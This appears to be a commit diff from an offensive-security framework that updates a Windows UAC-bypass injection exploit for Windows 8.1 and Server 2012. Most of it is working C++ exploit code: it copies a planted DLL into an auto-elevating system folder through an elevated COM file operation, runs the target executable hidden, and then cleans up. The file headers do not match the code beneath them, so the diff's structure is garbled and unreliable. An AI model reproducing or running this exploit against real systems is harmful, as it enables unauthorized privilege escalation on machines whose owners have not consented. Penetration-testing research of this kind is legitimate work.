Update bypass UAC to work on 8.1 and 2012

This commit contains a bunch of work that comes from Meatballs1 and
Lesage, and updates the bypassuac_inject module so that it works on
Windows 8.x and Windows 2012. Almost zero of the code in this module
can be attributed to me. Most of it comes from Ben's work.

I did do some code tidying, adjustment of style, etc. but other than
that it's all down to other people.

Author: OJ

data/post/bypassuac-x64.dll

@@ -93,7 +93,7 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
       <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <MinimalRebuild>true</MinimalRebuild>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
@@ -132,7 +132,7 @@
       <Optimization>MaxSpeed</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
       <FunctionLevelLinking>true</FunctionLevelLinking>
       <PrecompiledHeader />
@@ -190,13 +190,13 @@ copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
   </ItemDefinitionGroup>
   <ItemGroup>
     <ClCompile Include="src\Exploit.cpp" />
-    <ClCompile Include="src\ReflectiveDll.c" />
     <ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
+    <ClCompile Include="src\ReflectiveDll.c" />
   </ItemGroup>
   <ItemGroup>
-    <ClInclude Include="src\Exploit.h" />
     <ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
     <ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
+    <ClInclude Include="src\Exploit.h" />
   </ItemGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">

data/post/bypassuac-x86.dll

@@ -1,119 +1,158 @@
+#include "ReflectiveLoader.h"
 #include "Exploit.h"
 
-void exploit()
-{
-
-	const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
-	const wchar_t *szSysPrepDir_syswow64 = L"\\Sysnative\\sysprep\\";
-	const wchar_t *sySysPrepExe = L"sysprep.exe";
-	const wchar_t *szElevDll = L"CRYPTBASE.dll";
-	const wchar_t *szSourceDll = L"CRYPTBASE.dll";
-	wchar_t szElevDir[MAX_PATH] = {};
-	wchar_t szElevDir_syswow64[MAX_PATH] = {};
-	wchar_t szElevDllFull[MAX_PATH] = {};
-	wchar_t szElevDllFull_syswow64[MAX_PATH] = {};
-	wchar_t szElevExeFull[MAX_PATH] = {};
-	wchar_t path[MAX_PATH] = {};
-	wchar_t windir[MAX_PATH] = {};
-	const wchar_t *szElevArgs = L"";
-	const wchar_t  *szEIFOMoniker = NULL;
-	PVOID OldValue = NULL;
-
-	IFileOperation *pFileOp = NULL;
-	IShellItem *pSHISource = 0;
-	IShellItem *pSHIDestination = 0;
-	IShellItem *pSHIDelete = 0;
-
-	const IID *pIID_EIFO = &__uuidof(IFileOperation);
-	const IID *pIID_EIFOClass = &__uuidof(FileOperation);
-	const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
-
-	GetWindowsDirectoryW(windir, MAX_PATH);
-	GetTempPathW(MAX_PATH, path);
-
-	/* %temp%\cryptbase.dll */
-	wcscat_s(path, MAX_PATH, szSourceDll);
-	
-	/* %windir%\System32\sysprep\ */
-	wcscat_s(szElevDir, MAX_PATH, windir);
-	wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
-
-	/* %windir%\sysnative\sysprep\ */
-	wcscat_s(szElevDir_syswow64, MAX_PATH, windir);
-	wcscat_s(szElevDir_syswow64, MAX_PATH, szSysPrepDir_syswow64);
-
-	/* %windir\system32\sysprep\cryptbase.dll */
-	wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
-	wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
-
-	/* %windir\sysnative\sysprep\cryptbase.dll */
-	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDir_syswow64);
-	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDll);
-
-	/* %windir%\system32\sysprep\sysprep.exe */
-	wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
-	wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
-
-	if (CoInitialize(NULL) == S_OK)
-	{	
-		if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
+#define SAFERELEASE(x) if(NULL != x){x->Release(); x = NULL;}
+
+extern "C" {
+
+	void exploit(BypassUacPaths const * const paths)
+	{
+		const wchar_t *szElevArgs = L"";
+		const wchar_t *szEIFOMoniker = NULL;
+
+		PVOID OldValue = NULL;
+
+		IFileOperation *pFileOp = NULL;
+		IShellItem *pSHISource = 0;
+		IShellItem *pSHIDestination = 0;
+		IShellItem *pSHIDelete = 0;
+
+		BOOL bComInitialised = FALSE;
+
+		const IID *pIID_EIFO = &__uuidof(IFileOperation);
+		const IID *pIID_EIFOClass = &__uuidof(FileOperation);
+		const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
+
+		dprintf("[BYPASSUACINJ] szElevDir          = %S", paths->szElevDir);
+		dprintf("[BYPASSUACINJ] szElevDirSysWow64  = %S", paths->szElevDirSysWow64);
+		dprintf("[BYPASSUACINJ] szElevDll          = %S", paths->szElevDll);
+		dprintf("[BYPASSUACINJ] szElevDllFull      = %S", paths->szElevDllFull);
+		dprintf("[BYPASSUACINJ] szElevExeFull      = %S", paths->szElevExeFull);
+		dprintf("[BYPASSUACINJ] szDllTempPath      = %S", paths->szDllTempPath);
+
+		do
 		{
-			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)
+			if (CoInitialize(NULL) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Failed to initialize COM");
+				break;
+			}
+
+			bComInitialised = TRUE;
+
+			if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**)&pFileOp) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Couldn't create EIFO instance");
+				break;
+			}
+
+			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op.");
+				break;
+			}
+
+			if (SHCreateItemFromParsingName((PCWSTR)paths->szDllTempPath, NULL, *pIID_ShellItem2, (void**)&pSHISource) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to create item from name (source)");
+				break;
+			}
+
+			if (SHCreateItemFromParsingName(paths->szElevDir, NULL, *pIID_ShellItem2, (void**)&pSHIDestination) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to create item from name (destination)");
+				break;
+			}
+
+			if (pFileOp->CopyItem(pSHISource, pSHIDestination, paths->szElevDll, NULL) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to prepare copy op for elev dll");
+				break;
+			}
+
+			/* Copy the DLL file to the target folder*/
+			if (pFileOp->PerformOperations() != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to copy elev dll");
+				break;
+			}
+
+			/* Execute the target binary */
+			SHELLEXECUTEINFOW shinfo;
+			ZeroMemory(&shinfo, sizeof(shinfo));
+			shinfo.cbSize = sizeof(shinfo);
+			shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
+			shinfo.lpFile = paths->szElevExeFull;
+			shinfo.lpParameters = szElevArgs;
+			shinfo.lpDirectory = paths->szElevDir;
+			shinfo.nShow = SW_HIDE;
+
+			Wow64DisableWow64FsRedirection(&OldValue);
+			if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
+			{
+				WaitForSingleObject(shinfo.hProcess, 10000);
+				CloseHandle(shinfo.hProcess);
+			}
+
+			if (S_OK != SHCreateItemFromParsingName(paths->szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete)
+				|| NULL == pSHIDelete)
+			{
+				dprintf("[BYPASSUACINJ] Failed to create item from parsing name (delete)");
+				break;
+			}
+
+			if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
 			{
-				if (SHCreateItemFromParsingName((PCWSTR) path, NULL, *pIID_ShellItem2, (void**) &pSHISource) == S_OK)
-				{
-					if (SHCreateItemFromParsingName(szElevDir, NULL, *pIID_ShellItem2, (void**) &pSHIDestination) == S_OK)
-					{
-						if (pFileOp->CopyItem(pSHISource, pSHIDestination, szElevDll, NULL) == S_OK)
-						{
-							/* Copy the DLL file to the sysprep folder*/
-							if (pFileOp->PerformOperations() == S_OK)
-							{
-								/* Execute sysprep.exe */
-								SHELLEXECUTEINFOW shinfo;
-								ZeroMemory(&shinfo, sizeof(shinfo));
-								shinfo.cbSize = sizeof(shinfo);
-								shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
-								shinfo.lpFile = szElevExeFull;
-								shinfo.lpParameters = szElevArgs;
-								shinfo.lpDirectory = szElevDir;
-								shinfo.nShow = SW_HIDE;
-
-								Wow64DisableWow64FsRedirection(&OldValue);
-								if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
-								{
-									WaitForSingleObject(shinfo.hProcess, 10000);
-									CloseHandle(shinfo.hProcess);
-								}
-
-								if (S_OK == SHCreateItemFromParsingName(szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
-								{
-									if (0 != pSHIDelete)
-									{
-										if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
-										{
-                      pFileOp->PerformOperations();
-											// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
-											// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
-											// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
-											if (S_OK == SHCreateItemFromParsingName(szElevDllFull_syswow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
-											{
-												if (0 != pSHIDelete)
-												{
-													if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
-													{
-														pFileOp->PerformOperations();
-													}
-												}
-											}
-										}
-									}
-								}
-							}
-						}
-					}
-				}
+				dprintf("[BYPASSUACINJ] Failed to prepare op for delete");
+				break;
 			}
+
+			if (pFileOp->PerformOperations() == S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Successfully deleted dll");
+
+				// bail out this point because we don't need to keep trying to delete
+				break;
+			}
+
+			SAFERELEASE(pSHIDelete);
+
+			// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
+			// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
+			// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
+			if (S_OK != SHCreateItemFromParsingName(paths->szElevDirSysWow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete)
+				|| NULL == pSHIDelete)
+			{
+				dprintf("[BYPASSUACINJ] Failed to create item from parsing name for delete (shellitem2)");
+				break;
+			}
+
+			if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
+			{
+				dprintf("[BYPASSUACINJ] Failed to prepare op for delete (shellitem2)");
+				break;
+			}
+
+			if (pFileOp->PerformOperations() == S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Successfully deleted DLL in target directory from SYSWOW64 process");
+			}
+			else
+			{
+				dprintf("[BYPASSUACINJ] Failed to delete target DLL");
+			}
+
+		} while (0);
+
+		SAFERELEASE(pSHIDelete);
+		SAFERELEASE(pSHIDestination);
+		SAFERELEASE(pSHISource);
+		SAFERELEASE(pFileOp);
+
+		if (bComInitialised)
+		{
+			CoUninitialize();
 		}
 	}
-}
+
+}

external/source/exploits/bypassuac_injection/dll/reflective_dll.vcxproj

@@ -5,4 +5,32 @@
 #include <stdio.h>
 #include <guiddef.h>
 
-EXTERN_C void exploit();
+// Uncomment this line to include debug output
+//#define DEBUGTRACE
+
+#ifdef DEBUGTRACE
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+static void real_dprintf(char *format, ...)
+{
+	va_list args;
+	char buffer[1024];
+	va_start(args, format);
+	vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format, args);
+	strcat_s(buffer, sizeof(buffer), "\r\n");
+	OutputDebugStringA(buffer);
+}
+#else
+#define dprintf(...)
+#endif
+
+typedef struct _BypassUacPaths
+{
+	wchar_t szElevDir[MAX_PATH];
+	wchar_t szElevDirSysWow64[MAX_PATH];
+	wchar_t szElevDll[MAX_PATH];
+	wchar_t szElevDllFull[MAX_PATH];
+	wchar_t szElevExeFull[MAX_PATH];
+	wchar_t szDllTempPath[MAX_PATH];
+} BypassUacPaths;
+
+EXTERN_C void exploit(BypassUacPaths const * const paths);

external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp

@@ -5,22 +5,29 @@ extern HINSTANCE hAppInstance;
 
 BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
 {
-    BOOL bReturnValue = TRUE;
-	switch( dwReason ) 
-    { 
-		case DLL_QUERY_HMODULE:
-			if( lpReserved != NULL )
-				*(HMODULE *)lpReserved = hAppInstance;
-			break;
-		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
-			exploit();
-			ExitProcess(0);
-			break;
-		case DLL_PROCESS_DETACH:
-		case DLL_THREAD_ATTACH:
-		case DLL_THREAD_DETACH:
-            break;
-    }
-	return bReturnValue;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+		{
+			*(HMODULE *)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+
+		if (NULL != lpReserved)
+		{
+			dprintf("[BYPASSUACINJ] Launching exploit with 0x%p", lpReserved);
+			exploit((BypassUacPaths*)lpReserved);
+		}
+
+		ExitProcess(0);
+		break;
+	default:
+		break;
+	}
+
+	return TRUE;
+
 }

external/source/exploits/bypassuac_injection/dll/src/Exploit.h

@@ -90,7 +90,7 @@ def is_uac_enabled?
     uac = false
     winversion = session.sys.config.sysinfo['OS']
 
-    if winversion =~ /Windows (Vista|7|8|2008)/
+    if winversion =~ /Windows (Vista|7|8|2008|2012)/
       unless is_system?
         begin
           enable_lua = registry_getvaldata(